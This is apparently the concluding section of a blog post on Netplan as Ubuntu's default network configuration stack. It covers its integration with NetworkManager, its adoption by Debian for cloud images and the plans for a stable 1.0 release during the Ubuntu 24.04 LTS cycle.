Netplan has established itself as the proven network stack across all variants of Ubuntu – Desktop, Server, Cloud, or Embedded. It has been the default stack across many Ubuntu LTS releases, serving millions of users over the years. With the bidirectional integration between NetworkManager and Netplan the final piece of the puzzle is implemented to consider Netplan the “single source of truth” for network configuration on Ubuntu. With Debian choosing Netplan to be the default network stack for their cloud images, it is also gaining traction outside the Ubuntu ecosystem and growing into the wider open source community.

Within the development cycle for Ubuntu 24.04 LTS, we will polish the Netplan codebase to be ready for a 1.0 release, coming with certain guarantees on API and ABI stability, so that other distributions and 3rd party integrations can rely on Netplan’s interfaces. First steps in that direction have already been taken, as the Netplan team reached out to the Debian community at DebConf 2023 in Kochi/India to evaluate possible synergies.

Conclusion

Netplan can be used transparently to control a workstation’s network configuration and works hand in hand with many desktop environments through its tight integration with NetworkManager. It allows for easy network monitoring using common graphical interfaces and provides a “single source of truth” for network administrators, allowing for configuration of Ubuntu Desktop fleets in a streamlined and declarative way. You can try this new functionality hands-on by following the “Access Desktop NetworkManager settings through Netplan” tutorial.


If you want to learn more, feel free to follow our activities on Netplan.io, GitHub, Launchpad, IRC or our Netplan Developer Diaries blog on discourse.

on November 12, 2023 03:00 PM